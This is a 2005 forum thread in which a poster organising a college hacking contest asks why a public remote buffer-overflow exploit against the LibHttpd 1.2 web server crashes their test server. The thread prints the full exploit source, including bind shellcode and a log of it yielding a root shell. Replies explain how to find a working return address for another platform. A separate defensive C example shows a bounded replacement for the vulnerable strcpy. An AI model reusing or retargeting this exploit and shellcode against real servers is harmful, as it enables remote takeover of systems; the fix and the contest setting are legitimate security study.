-
September 11th, 2005, 06:01 PM
#1
LibHttp 1.2 BO exploit Help
Hey !
I'm trying to organise a hacking contest for my college. I've decided to use LibHttpd 1.2, a very basic web server. This version is prone to a BO.
The following is the vulnerable part of the code:

void httpdProcessRequest(server)
httpd *server;
{
    char dirName[HTTP_MAX_URL],
    ...
    server->response.responseLength = 0;
    strcpy(dirName, httpdRequestPath(server)); // here.
So, I set up a small test server on my Slackware box and tried the following exploit code:
/*
**
** Lib HTTPd Remote Buffer Overflow exploit
** by Xpl017Elz
** __
** Testing exploit:
**
** bash$ (./0x82-Remote.libhttpdxpl;cat)|nc libhttphost 80
**
** (Ctrl+c)
** punt!
** bash$ nc libhttphost 3879
** uname
** Linux
** id
** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),
** 3(sys),4(adm),6(disk),10(wheel)
** exit
** bash$
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc_at_hotmail.com>.
** My World: http://x82.i21c.net
**
*/
#include <stdio.h>

int main(/* args? */)
{
    int shadd2r;
    char b1ndsh[] = /* 129byte bindshellcode */
        "\211\3451\322\262f\211\3201\311\211\313C\211]\370C\211]\364K\211M\374\215M"
        "\364\315\2001\311\211E\364Cf\211]\354f\307E\356\017'\211M\360\215E\354\211E"
        "\370\306E\374\020\211\320\215M\364\315\200\211\320CC\315\200\211\320C\315"
        "\200\211\3031\311\262?\211\320\315\200\211\320A\315\200\353\030^\211u"
        "\b1\300\210F\007\211E\f\260\013\211\363\215M\b\215U\f\315\200\350\343\377"
        "\377\377/bin/sh";

    //--- POST &shellcode ---//
    fprintf(stdout,"POST ");
    for(shadd2r=0;shadd2r<0x408;shadd2r+=4)
    {   /* rEDhAT Default: 0x804e482,
           Debian Address? */
        fprintf(stdout,"\202\344\004\b");
    }
    fprintf(stdout,"\r\n");

    //--- NOP,shellcode ---//
    for(shadd2r=0;shadd2r<0x3e8;shadd2r++)
    {   /* SSSSSSSS...SSSSSSSSS;;; */
        fprintf(stdout,"S");
    }
    fprintf(stdout,"%s\r\nx0x\r\nx82\r\nl0l\r\n",b1ndsh);
    return 0;
}
After executing the exploit, the web server crashed and gave a segmentation fault error. It wasn't able to keep a port open. I'm not all that good at debugging. Could someone please tell me what went wrong?
http://www.utimaco.us/lists/bugtraq/2002/Nov/0208.html
Thanks a lot in advance
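The root cause in the snippet above is the unbounded strcpy() into the fixed-size dirName buffer. Below is an added, defender-side example (not part of this post or of LibHttpd's own source) of what a bounded replacement for that copy looks like, plus the request-level decision a server should make when a path does not fit. HTTP_MAX_URL is assumed to be 1024 here; the real constant from LibHttpd 1.2 is not given in this thread.

```c
#include <stdio.h>
#include <string.h>

/* Assumed value; the real HTTP_MAX_URL of LibHttpd 1.2 is not given on this page. */
#define HTTP_MAX_URL 1024

/* Bounded replacement for strcpy(dirName, httpdRequestPath(server)).
 * Copies path into dest only if it fits including the terminating NUL.
 * Returns 0 on success; -1 (and an empty dest) if the path is too long. */
int copy_request_path(char *dest, size_t dest_size, const char *path)
{
    size_t len = 0;
    /* Bounded scan: never look past dest_size bytes of path. */
    while (len < dest_size && path[len] != '\0')
        len++;
    if (len >= dest_size) {          /* no room for the NUL: refuse, don't overflow */
        if (dest_size > 0)
            dest[0] = '\0';
        return -1;
    }
    memcpy(dest, path, len + 1);     /* len + 1 copies the NUL as well */
    return 0;
}

/* What httpdProcessRequest() should do with the result: continue (0) or
 * answer 414 (URI Too Long) instead of proceeding with an overflowed buffer. */
int check_request_path(const char *path)
{
    char dirName[HTTP_MAX_URL];
    return copy_request_path(dirName, sizeof dirName, path) == 0 ? 0 : 414;
}

/* Demo helper: constructs a path of n 'A' characters (capped at 4096) and
 * runs the check on it. The input is constructed, not captured traffic. */
int check_path_of_length(size_t n)
{
    static char path[4097];
    if (n > 4096)
        n = 4096;
    memset(path, 'A', n);
    path[n] = '\0';
    return check_request_path(path);
}

int main(void)
{
    printf("16-byte path     -> %d\n", check_path_of_length(16));               /* 0   */
    printf("max-1 byte path  -> %d\n", check_path_of_length(HTTP_MAX_URL - 1)); /* 0   */
    printf("max byte path    -> %d\n", check_path_of_length(HTTP_MAX_URL));     /* 414 */
    printf("2048-byte path   -> %d\n", check_path_of_length(2048));             /* 414 */
    return 0;
}
```

The boundary case matters: a path of exactly HTTP_MAX_URL characters needs HTTP_MAX_URL + 1 bytes with its NUL, so it must be rejected, not just truncated.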
-
September 11th, 2005, 07:42 PM
#2
Looks like it was written to be run against a redhat box running the server. Perhaps the return address is different on slackware and that's why it's segfaulting. Fool around with it a bit. You can probably get it to work. Good luck.
-
September 12th, 2005, 02:03 AM
#3
Thanks for the reply Heretic. But, how do I find the return address for a Slackware box? Can it be found using GDB?
-
September 12th, 2005, 03:55 PM
#4
I would change libhttp 1.2's code from where you pasted to print out the address of dirName:

fprintf(stderr, "0x%x\n", dirName);

Then recompile and run it. Then make a request and see the address it prints out. You will want to make that your return address. You may have to nudge it around a bit though. Actually, that will probably be way off from the return address you want. It looks like the code sends the return address, then a nop sled, then the shellcode. So the shellcode will be way ahead of the address of dirName. I'm pretty sure dirName will only contain the return address, and the return address is probably another variable in which they put the shellcode. They probably store stuff in new variables based on lines in the request. So when the attacker sends \r\n, it stores what follows in a new variable, I'm guessing. So you will want the address of another char[] as your return address. I'm sort of typing as I think about it, so that's why I'm contradicting myself a lot :P. Hopefully what I said helps. Good luck.
-
September 13th, 2005, 06:27 PM
#5
I don't quite understand how the initial 1024 bytes of the buffer is filled with the return address. Is fprintf(stdout,"\202\344\004\b"); the representation of 0x804e482? If so, how does it go?